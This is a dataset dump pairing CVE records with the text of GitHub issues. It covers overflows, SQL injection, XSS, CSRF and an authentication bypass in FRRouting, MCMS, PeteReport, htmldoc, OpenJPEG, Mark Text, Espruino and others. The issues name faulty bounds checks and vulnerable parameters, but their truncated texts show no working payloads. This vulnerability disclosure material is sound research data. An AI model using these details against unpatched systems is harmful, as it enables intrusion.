cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-26125
2022-03-03T18:15:08.090
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the input packet length in isisd/isis_tlvs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10507" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/0...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExclu...
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10507
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
https://github.com/FRRouting/frr/blob/18ed776ca29533f6c49479b1a0dd95d36bb6b5ec/isisd/isis_tlvs.c#L3004-L3114 There are a few issues in the loop above leading to overflow vulnerabilities. The loop condition is `subtlv_len > 2` and `subtlv_len` is updated at the end of the loop (Line 3113: `subtlv_len = subtlv_len - l...
isisd: overflow bugs in unpack_tlv_router_cap
https://api.github.com/repos/FRRouting/frr/issues/10507/comments
21
2022-02-06T03:32:58Z
2022-03-29T11:10:30Z
https://github.com/FRRouting/frr/issues/10507
1,125,093,957
10,507
3,280
CVE-2022-26126
2022-03-03T18:15:08.143
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to the use of strdup with a non-zero-terminated binary string in isis_nb_notifications.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10505" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/0...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "162AA0AE-3CBF-4961-AAC0-DAD4C6495E0E", "versionEndExcluding": "8.2", "versionEndIncluding": null, "versionStartExclu...
[ "119" ]
119
https://github.com/FRRouting/frr/issues/10505
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
At Line 470 in the code below, we call `yang_data_new`, which will further call `strdup(raw_pdu)`. However, `raw_pdu` is not guaranteed to be a zero-terminated string and, thus, will lead to a stack overflow in `strdup`. When I set `raw_pdu[raw_pdu_len - 1]` to `\0`, then the bug disappears. Note that `strdup` should b...
isisd: misusing strdup leads to stack overflow
https://api.github.com/repos/FRRouting/frr/issues/10505/comments
6
2022-02-05T05:11:16Z
2022-03-28T18:26:03Z
https://github.com/FRRouting/frr/issues/10505
1,124,837,704
10,505
3,281
CVE-2022-26127
2022-03-03T18:15:08.193
A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to missing a check on the input packet length in the babel_packet_examin function in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10487" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/0...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExclu...
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10487
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
The code below misses a check on the relationship between `packetlen` and `bodylen` before Line 298, which may lead to buffer overflows when accessing the memory at Line 300 and Line 309. https://github.com/FRRouting/frr/blob/3d1ff4bfdb159583a62e72ccb359a8508c4cbb2e/babeld/message.c#L289-L309 To fix, we may put t...
Miss a check on length in Babel
https://api.github.com/repos/FRRouting/frr/issues/10487/comments
3
2022-02-03T02:44:29Z
2022-03-28T18:25:30Z
https://github.com/FRRouting/frr/issues/10487
1,122,594,188
10,487
3,282
CVE-2022-26128
2022-03-03T18:15:08.243
A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to a wrong check on the input packet length in the babel_packet_examin function in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10502" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/0...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExclu...
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10502
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
The check at Line 310 is not correct. It should be `i + len + 2 > bodylen` rather than `i + len > bodylen`, because `len` does not include the first two bytes, i.e., `message[0]` and `message[1]` https://github.com/FRRouting/frr/blob/ab68283ceedc05ea1a7f9c54f03a87f5dc199a01/babeld/message.c#L300-L312
Incorrect checks on length in babeld
https://api.github.com/repos/FRRouting/frr/issues/10502/comments
2
2022-02-04T18:10:06Z
2022-03-28T18:25:13Z
https://github.com/FRRouting/frr/issues/10502
1,124,478,987
10,502
3,283
CVE-2022-26129
2022-03-03T18:15:08.287
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the subtlv length in the functions, parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10503" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/0...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExclu...
[ "119" ]
119
https://github.com/FRRouting/frr/issues/10503
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
https://github.com/FRRouting/frr/blob/e743c1b8e7989d7e3dc9092603bfb638958fa166/babeld/message.c#L131-L151 Line 143: the condition should be `i + 1 >= alen` instead of `i + 1 > alen`. Otherwise, overflows will happen at 147. Line 148: the condition should be `i + len + 2 > alen` instead of `i + len > alen`. We nee...
babeld: bugs in parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv
https://api.github.com/repos/FRRouting/frr/issues/10503/comments
6
2022-02-04T21:17:08Z
2022-03-28T18:29:44Z
https://github.com/FRRouting/frr/issues/10503
1,124,623,649
10,503
3,284
CVE-2022-23898
2022-03-03T19:15:08.777
MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "7A74A0D5-A438-4804-B9BE-1ED20C9BCB26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/62
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
A suspicious point was found in the `IContentDao.xml` file <img width="953" alt="image" src="https://user-images.githubusercontent.com/47287118/150347037-bc446f1c-5e97-4a41-897a-18c0370ff8db.png"> Since the `id` of `select` maps to a method in Java, and this XML corresponds to Content, we looked directly in `Comten...
MCMS5.2.5 SQLI
https://api.github.com/repos/ming-soft/MCMS/issues/62/comments
0
2022-01-20T13:28:38Z
2024-04-23T07:18:22Z
https://github.com/ming-soft/MCMS/issues/62
1,109,303,384
62
3,285
CVE-2022-23899
2022-03-03T19:15:08.843
MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via search.do in the file /web/MCmsAction.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "7A74A0D5-A438-4804-B9BE-1ED20C9BCB26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/63
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run <img width="949" alt="image" src="https://user-images.githubusercontent.com/47287118/150349256-f4d140be-c973-468c-9239-384309afd3a7.png"> Look up for `filed` and find the incoming parameter <im...
MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI
https://api.github.com/repos/ming-soft/MCMS/issues/63/comments
1
2022-01-20T13:42:42Z
2022-09-09T01:42:59Z
https://github.com/ming-soft/MCMS/issues/63
1,109,318,365
63
3,286
CVE-2022-23051
2022-03-03T22:15:08.720
PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code while adding an 'Attack Tree' by modifying the 'svg_file' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/brown/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "h...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "79" ]
79
https://github.com/1modm/petereport/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. We will assign the cve id CVE-2022-23051 to this issue but the information will be released after the vulnerability is patched. Attached below are the links to our responsible disclosure policy. ...
Security Issue - Stored XSS (Attack Tree)
https://api.github.com/repos/1modm/petereport/issues/36/comments
1
2022-02-08T18:57:55Z
2022-02-08T21:27:49Z
https://github.com/1modm/petereport/issues/36
1,127,640,620
36
3,287
CVE-2022-23052
2022-03-03T22:15:08.760
PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings on the application.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/jett/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "352" ]
352
https://github.com/1modm/petereport/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. Attached below are the links to our responsible disclosure policy. - https://fluidattacks.com/advisories/policy # Bug description PeteReport **Version 0.5** contains a Cross Site Request F...
Security Issue - CSRF (Delete user,product,etc)
https://api.github.com/repos/1modm/petereport/issues/34/comments
2
2022-02-07T20:20:42Z
2022-02-08T18:18:09Z
https://github.com/1modm/petereport/issues/34
1,126,455,676
34
3,288
CVE-2022-24725
2022-03-03T22:15:08.950
Shescape is a shell escape package for JavaScript. An issue in versions 1.4.0 to 1.5.1 allows for exposure of the home directory on Unix systems when using Bash with the `escape` or `escapeAll` functions from the _shescape_ API with the `interpolation` option set to `true`. Other tested shells, Dash and Zsh, are not af...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", ...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/issues/169" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shescape_project:shescape:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "300F4AA8-8F2F-4AF5-B0B3-511E231C74DE", "versionEndExcluding": "1.5.1", "versionEndIncluding": null, "ver...
[ "78" ]
78
https://github.com/ericcornelissen/shescape/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ericcornelissen", "shescape" ]
# Bug Report - **Shescape version**: `v1.5.0` - **Operating system**: Unix (Ubuntu 20.04) - **Shell**: Bash ## Description If the string `=~` appears at the end of an argument in Bash (without quoting the argument) the tilde (`~`) will be expanded to the home directory. Similarly, when `xxx:~`, `~:xxx` or `x...
String like `=~` in Bash not escaped properly by escape(All) with interpolation escaping enabled
https://api.github.com/repos/ericcornelissen/shescape/issues/169/comments
0
2022-02-19T18:00:52Z
2022-02-22T08:42:32Z
https://github.com/ericcornelissen/shescape/issues/169
1,144,808,116
169
3,289
CVE-2022-25220
2022-03-03T22:15:09.010
PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code inside the markdown descriptions while creating a product, report or finding.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/armstrong/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "79" ]
79
https://github.com/1modm/petereport/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. Attached below are the links to our responsible disclosure policy. - https://fluidattacks.com/advisories/policy # Bug description PeteReport **Version 0.5** allows an authenticated admin...
Security Issue -Stored XSS (markdown)
https://api.github.com/repos/1modm/petereport/issues/35/comments
2
2022-02-07T20:21:47Z
2024-06-04T10:10:58Z
https://github.com/1modm/petereport/issues/35
1,126,456,813
35
3,290
CVE-2021-26259
2022-03-03T23:15:08.033
A flaw was found in htmldoc in v1.9.12. Heap buffer overflow in render_table_row(),in ps-pdf.cxx may lead to arbitrary code execution and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/0ddab26a542c74770317b622e985c52430092ba5" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/417
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the render_table_row() ps-pdf.cxx:6123:34 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc7.html p...
AddressSanitizer: heap-buffer-overflow on render_table_row() ps-pdf.cxx:6123:34
https://api.github.com/repos/michaelrsweet/htmldoc/issues/417/comments
3
2021-01-26T08:58:27Z
2022-03-11T05:17:23Z
https://github.com/michaelrsweet/htmldoc/issues/417
794,054,116
417
3,291
CVE-2021-26948
2022-03-03T23:15:08.090
Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/410" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.11:*:*:*:*:*:*:*", "matchCriteriaId": "F3C6490A-0378-4647-A044-BE4C49DC2904", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "476" ]
476
https://github.com/michaelrsweet/htmldoc/issues/410
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
While fuzzing htmldoc I found a segmentation fault in the copy_image() function, in epub.cxx:1221 testcase:(zipped so GitHub accepts it) [crash01.html.zip](https://github.com/michaelrsweet/htmldoc/files/5854045/crash01.html.zip) reproduced by running: ``` htmldoc -f demo.epub crash01.html ``` html...
SEGV on unknown address 0x000000000000
https://api.github.com/repos/michaelrsweet/htmldoc/issues/410/comments
2
2021-01-22T07:34:10Z
2022-03-11T02:53:22Z
https://github.com/michaelrsweet/htmldoc/issues/410
791,775,016
410
3,292
CVE-2022-0730
2022-03-03T23:15:08.253
Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/4562" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.deb...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.19:*:*:*:*:*:*:*", "matchCriteriaId": "A4BB8CCB-5F52-4248-947C-3F4F1211EF53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "287" ]
287
https://github.com/Cacti/cacti/issues/4562
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
# Describe the bug Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. ## Expected behavior Cacti security model should work when Anonymous binding is enabled.
When using LDAP, authentication process may be bypassed
https://api.github.com/repos/Cacti/cacti/issues/4562/comments
3
2022-02-21T18:07:52Z
2022-12-02T00:02:09Z
https://github.com/Cacti/cacti/issues/4562
1,146,096,866
4,562
3,293
CVE-2021-3575
2022-03-04T18:15:08.193
A heap-based buffer overflow was found in openjpeg in color.c:379:42 in sycc420_to_rgb when decompressing a crafted .j2k file. An attacker could use this to execute arbitrary code with the permissions of the application compiled against openjpeg.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957616" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "EF45E1A1-20FD-4C31-889F-CE36BE70E370", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "versionStartExcl...
[ "787" ]
787
https://github.com/uclouvain/openjpeg/issues/1347
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Hi, I found a vulnerability in current master [0bda718](https://github.com/uclouvain/openjpeg/commit/0bda7188b7b545232a341f1d978b1e4feda46fc2), and I also reproduced it on latest released version [v2.4.0](https://github.com/uclouvain/openjpeg/releases/tag/v2.4.0). **Crash Summary** A heap-buffer-overflow in color....
Heap-buffer-overflow in color.c:379:42 in sycc420_to_rgb
https://api.github.com/repos/uclouvain/openjpeg/issues/1347/comments
21
2021-04-30T00:10:00Z
2024-02-18T16:18:37Z
https://github.com/uclouvain/openjpeg/issues/1347
871,701,067
1,347
3,294
CVE-2022-25069
2022-03-05T01:15:07.730
Mark Text v0.16.3 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability which allows attackers to perform remote code execution (RCE) via injecting a crafted payload into /lib/contentState/pasteCtrl.js.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2990" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://githu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:marktext:marktext:0.16.3:*:*:*:*:*:*:*", "matchCriteriaId": "4A4CFB6C-DCF9-4F86-8DD4-DBE2FC6411C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/marktext/marktext/issues/2990
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marktext", "marktext" ]
<!-- - Please search for issues that matches the one you want to file and use the thumbs up emoji. - Please make sure your application version is up to date. --> ### Description An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS. ```html <!-...
Security issue: DOM based XSS & RCE - from pasting vulnerable HTML
https://api.github.com/repos/marktext/marktext/issues/2990/comments
0
2022-02-07T17:22:39Z
2022-02-18T10:01:25Z
https://github.com/marktext/marktext/issues/2990
1,126,281,135
2,990
3,295
CVE-2022-25044
2022-03-05T02:15:06.900
Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/commit/e069be2ecc5060ef47391716e4de94999595b260" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2.11.251:*:*:*:*:*:*:*", "matchCriteriaId": "F24AA233-1A59-441A-BE52-01F1A375F437", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "787" ]
787
https://github.com/espruino/Espruino/issues/2142
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "espruino", "Espruino" ]
### Environment ``` OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : a8c74cbe557924dec90cc0da4f7a6a180a1a47d6 Version : 2v11 Build : CFLAGS += -fsanitize=address -fno-omit-frame-pointer ``` ### Proof of concept ``` f...
stack-buffer-overflow jsvar.c:108:51 in jsvIsArray
https://api.github.com/repos/espruino/Espruino/issues/2142/comments
2
2022-02-08T12:58:50Z
2022-02-08T14:59:08Z
https://github.com/espruino/Espruino/issues/2142
1,127,223,414
2,142
3,296
CVE-2022-25465
2022-03-05T02:15:06.947
Espruino 2v11 release was discovered to contain a stack buffer overflow via src/jsvar.c in jsvGetNextSibling.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/2136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2.11:*:*:*:*:*:*:*", "matchCriteriaId": "93283065-9BF1-451E-8744-DF2A1CB225EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "787" ]
787
https://github.com/espruino/Espruino/issues/2136
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "espruino", "Espruino" ]
